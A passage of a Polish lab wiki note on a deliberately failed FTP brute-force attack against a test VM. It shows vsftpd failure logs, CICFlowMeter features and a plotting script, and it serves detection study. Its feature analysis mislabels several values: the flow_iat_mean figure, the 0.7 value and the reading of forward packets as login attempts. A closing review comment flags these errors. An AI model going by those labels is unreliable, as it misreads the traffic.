 +W tym przypadku atak się nie powiedzie, ponieważ utworzone hasło nie znajduje się w rockyou.txt – i o to właśnie chodzi: chodzi o symulację nieudanego ataku, który będzie wyraźnie widoczny w ruchu.
 +</WRAP>
 +
 +
 +====== Efekty Ataku ======
 +
 +===== Po stronie atakującej =====
 +
 +  * Konsola Patatora wykaże tysiące nieudanych prób.
 +  * Hasło nie zostanie złamane.
 +  * Cały ruch jest zapisany w ftp_attack.pcap.
 +
 +===== Po stronie serwera FTP =====
 +
 +Fragment logu z /var/log/vsftpd.log:
 +<code yaml>
 +administrator@target:~$ sudo tail -f /var/log/vsftpd.log
 +[sudo] password for administrator:
 +Thu Jun 19 15:27:39 2025 [pid 6752] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:27:50 2025 [pid 6751] [ftpuser] OK LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7001] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7003] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7005] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7007] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7009] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7011] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7013] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7015] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7017] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:35 2025 [pid 7019] CONNECT: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:40:37 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:41:30 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7006] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7008] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7002] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7000] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7012] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7010] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7004] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7014] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7018] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +Thu Jun 19 15:42:23 2025 [pid 7016] [ftpuser] FAIL LOGIN: Client "10.10.10.2"
 +[TUTAJ CIĄGNIE SIĘ DALEJ]
 +</code>
 +
 +Pełna wersja logów do pobrania {{:notatki:vsftpd_copy.log}}
 +
 +<WRAP center round info 60%>
 +Po 765 próbach (~122min) zatrzymano eksperyment
 +</WRAP>
 + 
 +
 +====== Użycie CICFlowMeter (Python) i ekstrakcja cech ======
 +
 +<code bash>
 +administrator@attacker:~$ cicflowmeter -f ftp_attack.pcap -c ftp_attack.csv
 +reading from file ftp_attack.pcap, link-type EN10MB (Ethernet), snapshot length 262144
 +administrator@attacker:~$ ls -lah
 +total 186M
 +drwxr-x--- 7 administrator administrator 4.0K Jun 19 17:16 .
 +drwxr-xr-x 3 root          root          4.0K Jun 19 15:07 ..
 +-rw------- 1 administrator administrator 1.1K Jun 19 15:25 .bash_history
 +-rw-r--r-- 1 administrator administrator  220 Mar 31  2024 .bash_logout
 +-rw-r--r-- 1 administrator administrator 3.7K Mar 31  2024 .bashrc
 +drwx------ 4 administrator administrator 4.0K Jun 19 17:15 .cache
 +drwx------ 2 administrator administrator 4.0K Jun 19 17:15 .config
 +-rw-rw-r-- 1 administrator administrator 263K Jun 19 17:16 ftp_attack.csv
 +-rw-r--r-- 1 tcpdump       tcpdump       750K Jun 19 17:09 ftp_attack.pcap
 +drwxrwxr-x 7 administrator administrator 4.0K Jun 19 15:13 patator
 +-rw-r--r-- 1 administrator administrator  807 Mar 31  2024 .profile
 +-rw------- 1 administrator administrator 134M Sep 23  2015 rockyou.txt
 +-rw-rw-r-- 1 administrator administrator  51M Jun 19 15:19 rockyou.txt.tar.gz
 +drwx------ 2 administrator administrator 4.0K Jun 19 15:07 .ssh
 +-rw-r--r-- 1 administrator administrator    0 Jun 19 15:08 .sudo_as_admin_successful
 +drwxrwxr-x 6 administrator administrator 4.0K Jun 19 15:16 venv_patator
 +-rw-rw-r-- 1 administrator administrator  215 Jun 19 15:19 .wget-hsts
 +-rw------- 1 administrator administrator  108 Jun 19 15:25 .Xauthority
 +administrator@attacker:~$ cat ftp_attack.csv
 +src_ip,dst_ip,src_port,dst_port,protocol,timestamp,flow_duration,flow_byts_s,flow_pkts_s,fwd_pkts_s,bwd_pkts_s,tot_fwd_pkts,tot_bwd_pkts,totlen_fwd_pkts,totlen_bwd_pkts,fwd_pkt_len_max,fwd_pkt_len_min,fwd_pkt_len_mean,fwd_pkt_len_std,bwd_pkt_len_max,bwd_pkt_len_min,bwd_pkt_len_mean,bwd_pkt_len_std,pkt_len_max,pkt_len_min,pkt_len_mean,pkt_len_std,pkt_len_var,fwd_header_len,bwd_header_len,fwd_seg_size_min,fwd_act_data_pkts,flow_iat_mean,flow_iat_max,flow_iat_min,flow_iat_std,fwd_iat_tot,fwd_iat_max,fwd_iat_min,fwd_iat_mean,fwd_iat_std,bwd_iat_tot,bwd_iat_max,bwd_iat_min,bwd_iat_mean,bwd_iat_std,fwd_psh_flags,bwd_psh_flags,fwd_urg_flags,bwd_urg_flags,fin_flag_cnt,syn_flag_cnt,rst_flag_cnt,psh_flag_cnt,ack_flag_cnt,urg_flag_cnt,ece_flag_cnt,down_up_ratio,pkt_size_avg,init_fwd_win_byts,init_bwd_win_byts,active_max,active_min,active_mean,active_std,idle_max,idle_min,idle_mean,idle_std,fwd_byts_b_avg,fwd_pkts_b_avg,bwd_byts_b_avg,bwd_pkts_b_avg,fwd_blk_rate_avg,bwd_blk_rate_avg,fwd_seg_size_avg,bwd_seg_size_avg,cwr_flag_count,subflow_fwd_pkts,subflow_bwd_pkts,subflow_fwd_byts,subflow_bwd_byts
 +10.10.10.1,10.10.10.2,21,37852,6,2025-06-19 15:41:31,103.324816,12.12680601337824,0.1645296905246848,0.09678217089687341,0.06774751962781139,10,7,736,517,100,54,73.6,15.226293048539425,81,66,73.85714285714286,6.854166020511517,100,54,73.70588235294117,12.479464099930464,155.73702422145328,200,140,20,4,6.457801,49.981098,0.0,16.465319560282826,103.324816,50.001816,0.0,11.480535111111113,20.609759023049122,103.284029,49.981098,4e-05,17.21400483333333,23.19276500435293,4,3,0,0,3,0,2,7,15,0,0,0.7,73.70588235294117,510,502,0,0,0,0,0,0,0,0,0,0,0,0,0,0,73.6,73.85714285714286,0,10,7,736,517
 +[I TAK DALEJ]
 +</code>
 +
 +
 +Wynik przechwytywania do pobrania {{:notatki:ftp_attack.pcap}}
 +
 +Wynik ekstrakcji cech do pobrania {{:notatki:ftp_attack.csv}}
 +
 +===== Kluczowe cechy wyniku (Analiza pierwszego wiersza CSV) =====
 +
 +<code>
 +src_ip=10.10.10.1, dst_ip=10.10.10.2, dst_port=37852, protocol=6 (TCP)
 +flow_duration=103.3 s  
 +tot_fwd_pkts=10, tot_bwd_pkts=7  
 +flow_byts_s ≈ 12.13 B/s, flow_pkts_s ≈ 0.165 pkt/s  
 +pkt_len_mean ≈ 73.7 B
 +flow_iat_mean ≈ 16.47 s
 +bwd_blk_rate_avg ≈ 0.7 (ilość pakietów w tył do przodu)
 +</code>
 +
 +  * ''flow_duration'' (~103 s) – sesja trwała ponad 1,5 minuty; w przypadku automatycznego ataku można się tego spodziewać, gdy serwer zwalnia odpowiedzi.
 +  * ''tot_fwd_pkts'' = 10, ''tot_bwd_pkts'' = 7 – 10 prób logowania z serwera (komunikaty żądania), 7 odpowiedzi serwera (błędy logowania).
 +  * ''flow_byts_s'' ≈ 12 B/s – to stosunkowo niska przepustowość, typowa dla sesji inicjowanych ręcznie lub przy wolnym ftp.
 +  * ''flow_pkts_s'' ≈ 0.165 pkt/s – bardzo rzadkie pakiety (średnio co 6 sekund), co może sugerować rate-limit lub timeout serwera.
 +  * ''flow_iat_mean'' ≈ 16 s – średnia odległość czasowa między pakietami to 16 s, co wskazuje na powolną interakcję między próbami.
 +
 +===== Uproszczona sygnatura ataku =====
 +
 +Poniżej prosty skrypt wizualizujący dane wyjściowe z programu CICFlowMeter:\\
 +<code python signature_grapher.py>
 +import pandas as pd
 +import matplotlib.pyplot as plt
 +
 +# Wczytanie danych z pliku CSV
 +df = pd.read_csv('ftp_attack.csv')
 +
 +# Wybór interesujących cech
 +features = ['flow_duration', 'flow_byts_s', 'flow_pkts_s', 'fwd_pkts_s', 'bwd_pkts_s',
 +            'tot_fwd_pkts', 'tot_bwd_pkts', 'totlen_fwd_pkts', 'totlen_bwd_pkts',
 +            'fwd_pkt_len_max', 'bwd_pkt_len_max', 'flow_iat_mean', 'flow_iat_std',
 +            'flow_iat_max', 'flow_iat_min']
 +df_selected = df[features]
 +
 +# Normalizacja danych (opcjonalnie)
 +df_normalized = (df_selected - df_selected.mean()) / df_selected.std()
 +
 +# Wizualizacja
 +plt.figure(figsize=(12, 8))
 +for feature in df_normalized.columns:
 +    plt.plot(df_normalized.index, df_normalized[feature], label=feature)
 +plt.title('Sygnatura Ataku')
 +plt.xlabel('Indeks Przepływu')
 +plt.ylabel('Znormalizowana Wartość')
 +plt.legend()
 +plt.grid(True)
 +plt.show()
 +</code>
 +
 +{{.:pasted:20250619-194744.png}}
 +
 +====== Wnioski ======
 +
 +  * Skuteczność ataku brute-force zależy od słownika – jeśli hasło użytkownika nie jest w słowniku, atak się nie powiedzie, choć nadal generuje duży ruch i może zostać wykryty.
 +  * Monitorowanie logów serwera FTP jest kluczowe – logi wyraźnie pokazują wielokrotne, nieudane próby logowania, co pozwala administratorowi wykryć próbę ataku.
 +  * Przechwytywanie i analiza ruchu (tcpdump + CICFlowMeter) – umożliwiają szczegółową analizę zachowania sieci podczas ataku, co może być wykorzystane do budowy systemów wykrywania włamań (IDS).
 +  * Ograniczenie szybkości ataku (--rate-limit=50) – jest istotne, aby nie przeciążyć serwera i lepiej symulować realistyczne warunki ataku.
 +  * Silne, losowe hasło zabezpiecza konto – stosowanie silnych haseł, które nie występują w popularnych słownikach, jest podstawową ochroną przed atakami brute-force.
 +  * Środowisko testowe oparte na VM i Hyper-V – pozwala na bezpieczne i kontrolowane przeprowadzanie eksperymentów bezpieczeństwa.
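Review bot: In the "Kluczowe cechy wyniku" block, two values are attributed to the wrong CSV columns. Counting the fields of the sample row against the header gives flow_iat_mean=6.457801 and flow_iat_std=16.465319560282826, so the line "flow_iat_mean ≈ 16.47 s" and the bullet built on it describe the standard deviation, not the mean. Likewise 0.7 is down_up_ratio (7 backward packets to 10 forward), while bwd_blk_rate_avg is 0 in that row. Suggest correcting both labels; the 6.46 s mean then also agrees with the "średnio co 6 sekund" remark under flow_pkts_s. The same row has src_ip=10.10.10.1 with src_port=21, and the vsftpd log names 10.10.10.2 as the client, so the forward direction of this flow is server to client: the 10 tot_fwd_pkts are server replies rather than login attempts, and the tot_fwd_pkts bullet should be reworded accordingly. With syn_flag_cnt=0 the row also does not include the connection handshake, which is worth stating before these features are treated as an IDS signature. In signature_grapher.py, any selected column with zero variance becomes NaN after the division by df_selected.std(); consider dropping constant columns before normalising.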
notatki/ftp_bruteforce.1750342201.txt.gz · last modified: by administrator